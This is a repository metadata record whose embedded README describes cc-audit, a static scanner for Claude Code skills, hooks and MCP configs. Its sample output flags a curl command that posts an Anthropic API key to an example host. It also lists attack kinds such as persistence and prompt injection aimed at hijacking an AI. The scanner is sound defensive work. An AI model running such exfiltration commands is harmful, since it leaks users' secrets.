{"id":41879567,"url":"https://github.com/ryo-ebata/cc-audit","last_synced_at":"2026-07-02T06:00:44.971Z","repository":{"id":334532164,"uuid":"1141437483","full_name":"ryo-ebata/cc-audit","owner":"ryo-ebata","description":"AI-free static security scanner for Claude Code artifacts (Skills, Hooks, MCP configs). Detects data exfiltration, prompt injection, and supply chain risks with deterministic, reproducible results.","archived":false,"fork":false,"pushed_at":"2026-07-01T14:03:00.000Z","size":1135,"stargazers_count":22,"open_issues_count":1,"forks_count":1,"subscribers_count":2,"default_branch":"main","last_synced_at":"2026-07-01T16:06:08.315Z","etag":null,"topics":["anthropic","claude-code","cli","hooks","mcp-server","rust","security-audit","skills","static-analysis"],"latest_commit_sha":null,"homepage":"https://crates.io/crates/cc-audit","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ryo-ebata.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2026-01-24T21:04:38.000Z","updated_at":"2026-07-01T15:28:02.000Z","dependencies_parsed_at":"2026-02-09T12:05:15.650Z","dependency_job_id":null,"html_url":"https://github.com/ryo-ebata/cc-audit","commit_stats":null,"previous_names":["ryo-ebata/cc-audit"],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/ryo-ebata/cc-audit","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryo-ebata%2Fcc-audit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryo-ebata%2Fcc-audit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryo-ebata%2Fcc-audit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryo-ebata%2Fcc-audit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ryo-ebata","download_url":"https://codeload.github.com/ryo-ebata/cc-audit/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryo-ebata%2Fcc-audit/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35034985,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-02T02:00:06.368Z","response_time":173,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["anthropic","claude-code","cli","hooks","mcp-server","rust","security-audit","skills","static-analysis"],"created_at":"2026-01-25T13:02:11.304Z","updated_at":"2026-07-02T06:00:44.950Z","avatar_url":"https://github.com/ryo-ebata.png","language":"Rust","funding_links":[],"categories":[],"sub_categories":[],"readme":"# cc-audit\n\n[![Crates.io](https://img.shields.io/crates/v/cc-audit.svg)](https://crates.io/crates/cc-audit)\n[![Crates.io Downloads](https://img.shields.io/crates/d/cc-audit.svg)](https://crates.io/crates/cc-audit)\n[![npm](https://img.shields.io/npm/v/@cc-audit/cc-audit)](https://www.npmjs.com/package/@cc-audit/cc-audit)\n[![npm Downloads](https://img.shields.io/npm/dt/@cc-audit/cc-audit)](https://www.npmjs.com/package/@cc-audit/cc-audit)\n[![Homebrew](https://img.shields.io/badge/homebrew-ryo--ebata%2Ftap-FBB040)](https://github.com/ryo-ebata/homebrew-tap)\n[![GitHub Stars](https://img.shields.io/github/stars/ryo-ebata/cc-audit)](https://github.com/ryo-ebata/cc-audit)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n[![CI](https://github.com/ryo-ebata/cc-audit/workflows/CI/badge.svg)](https://github.com/ryo-ebata/cc-audit/actions)\n[![codecov](https://codecov.io/gh/ryo-ebata/cc-audit/branch/main/graph/badge.svg)](https://codecov.io/gh/ryo-ebata/cc-audit)\n[![docs.rs](https://docs.rs/cc-audit/badge.svg)](https://docs.rs/cc-audit)\n[![MSRV](https://img.shields.io/badge/MSRV-1.85-blue.svg)](https://blog.rust-lang.org/)\n[![Rust Edition](https://img.shields.io/badge/edition-2024-orange.svg)](https://doc.rust-lang.org/edition-guide/)\n\n**Security auditor for Claude Code skills, hooks, and MCP servers.**\n\nScan third-party Claude Code artifacts for security vulnerabilities _before_ installation.\n\n[日本語ドキュメント](./docs/README.ja.md)\n\n## Why cc-audit?\n\nThe Claude Code ecosystem is growing rapidly, with thousands of Skills, Hooks, and MCP Servers distributed across marketplaces like [awesome-claude-code](https://github.com/hesreallyhim/awesome-claude-code). However:\n\n\u003e \"Anthropic does not manage or audit any MCP servers.\"\n\u003e — [Claude Code Security Docs](https://code.claude.com/docs/en/security)\n\nThis creates a significant security gap. Users must trust third-party artifacts without verification, exposing themselves to:\n\n- **Data Exfiltration** — API keys, SSH keys, and secrets sent to external servers\n- **Privilege Escalation** — Unauthorized sudo access, filesystem destruction\n- **Persistence** — Crontab manipulation, SSH authorized_keys modification\n- **Prompt Injection** — Hidden instructions that hijack Claude's behavior\n- **Overpermission** — Wildcard tool access (`allowed-tools: *`)\n\n**cc-audit** closes this gap by scanning artifacts before you install them.\n\n## Installation\n\n### Homebrew (macOS/Linux)\n\n```bash\nbrew install ryo-ebata/tap/cc-audit\n```\n\n### Cargo (Rust)\n\n```bash\ncargo install cc-audit\n```\n\n### npm (Node.js)\n\n```bash\n# Run directly\nnpx @cc-audit/cc-audit check ./my-skill/\n\n# Or install globally\nnpm install -g @cc-audit/cc-audit\ncc-audit check ./my-skill/\n```\n\n### From Source\n\n```bash\ngit clone https://github.com/ryo-ebata/cc-audit.git\ncd cc-audit \u0026\u0026 cargo install --path .\n```\n\n### Direct Download\n\nDownload binaries from [GitHub Releases](https://github.com/ryo-ebata/cc-audit/releases).\n\n## Quick Start\n\n```bash\n# Generate config file\ncc-audit init\n\n# Scan a skill directory\ncc-audit check ./my-skill/\n\n# Scan with JSON/HTML output\ncc-audit check ./skill/ --format json --output results.json\ncc-audit check ./skill/ --format html --output report.html\n\n# Strict mode (includes medium/low severity)\ncc-audit check ./skill/ --strict\n\n# Scan different artifact types\ncc-audit check --type mcp ~/.claude/mcp.json\ncc-audit check --type docker ./\ncc-audit check --type dependency ./\n\n# Watch mode for development\ncc-audit check --watch ./my-skill/\n\n# Scan all installed AI coding clients\ncc-audit check --all-clients\n\n# Scan a specific client\ncc-audit check --client cursor\ncc-audit check --client claude\n\n# Install pre-commit hook\ncc-audit hook init\n```\n\n## Example Output\n\n```\nScanning: ./awesome-skill/\n\nscripts/setup.sh:42:1: [ERROR] [CRITICAL] EX-001: Network request with environment variable\n     |\n  42 | curl -X POST https://api.example.com -d \"key=$ANTHROPIC_API_KEY\"\n     | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n     = why: Potential data exfiltration: network request with environment variable detected\n     = ref: CWE-200, CWE-319\n     = fix: Remove or encrypt sensitive data before transmission\n\nSKILL.md:3:1: [ERROR] [HIGH] OP-001: Wildcard tool permission\n     |\n   3 | allowed-tools: *\n     | ^^^^^^^^^^^^^^^^\n     = why: Overly permissive tool access detected\n     = ref: CWE-250\n     = fix: Specify explicit tool permissions instead of wildcard\n\n━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\nRisk Score: 60/100 [██████░░░░] HIGH\n\nSummary: 2 errors, 0 warnings (1 critical, 1 high, 0 medium, 0 low)\nResult: FAIL (exit code 1)\n```\n\n## Commands\n\n| Command | Description                             |\n| ------- | --------------------------------------- |\n| `check` | Scan paths for security vulnerabilities |\n| `init`  | Generate a default configuration file   |\n| `hook`  | Manage Git pre-commit hooks             |\n| `serve` | Run as MCP server                       |\n| `proxy` | Run as MCP proxy for runtime monitoring |\n\n## Documentation\n\n| Document                                   | Description                                      |\n| ------------------------------------------ | ------------------------------------------------ |\n| [CLI Reference](./docs/CLI.md)             | All command-line options                         |\n| [MCP Integration](./docs/MCP.md)           | Using cc-audit as an MCP server with Claude Code |\n| [Configuration](./docs/CONFIGURATION.md)   | Config files, custom rules, malware signatures   |\n| [Detection Rules](./docs/RULES.md)         | All detection rules and severity levels          |\n| [Advanced Features](./docs/FEATURES.md)    | Baseline/drift detection, auto-fix, watch mode   |\n| [CI/CD Integration](./docs/INTEGRATION.md) | GitHub Actions, GitLab CI, troubleshooting       |\n\n## Key Features\n\n- **100+ Detection Rules** — Exfiltration, privilege escalation, persistence, prompt injection, and more\n- **Multiple Scan Types** — Skills, hooks, MCP servers, commands, Docker, dependencies, subagents, plugins\n- **Multi-Client Support** — Auto-detect and scan Claude, Cursor, Windsurf, VS Code configurations\n- **Remote Repository Scanning** — Scan GitHub repositories directly, including awesome-claude-code ecosystem\n- **CVE Vulnerability Scanning** — Built-in database of known vulnerabilities in AI coding tools\n- **Risk Scoring** — 0-100 score with category breakdown\n- **Baseline/Drift Detection** — Prevent rug pull attacks\n- **MCP Pinning** — Pin tool configurations to detect unauthorized changes\n- **Auto-Fix** — Automatically fix certain issues\n- **Multiple Output Formats** — Terminal, JSON, SARIF, HTML, Markdown\n- **Security Badges** — Generate shields.io badges for your projects\n- **SBOM Generation** — CycloneDX format support\n- **Proxy Mode** — Runtime MCP monitoring with transparent proxy\n- **Watch Mode** — Real-time scanning during development\n- **CI/CD Ready** — SARIF output for GitHub Security integration\n\n## Contributing\n\nContributions are welcome! Please read our [Contributing Guide](CONTRIBUTING.md) before submitting a Pull Request.\n\n```bash\ngit clone https://github.com/ryo-ebata/cc-audit.git\ncd cc-audit\ncargo test\ncargo build --release\n```\n\n## Related Projects\n\n- [Claude Code](https://code.claude.com/) — Anthropic's official CLI for Claude\n- [Model Context Protocol](https://modelcontextprotocol.io/) — MCP specification\n\n## Security\n\nIf you discover a security vulnerability, please report it via [GitHub Security Advisories](https://github.com/ryo-ebata/cc-audit/security).\n\n## License\n\n[MIT](LICENSE)\n\n---\n\n**Scan before you install.**\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryo-ebata%2Fcc-audit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fryo-ebata%2Fcc-audit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryo-ebata%2Fcc-audit/lists"}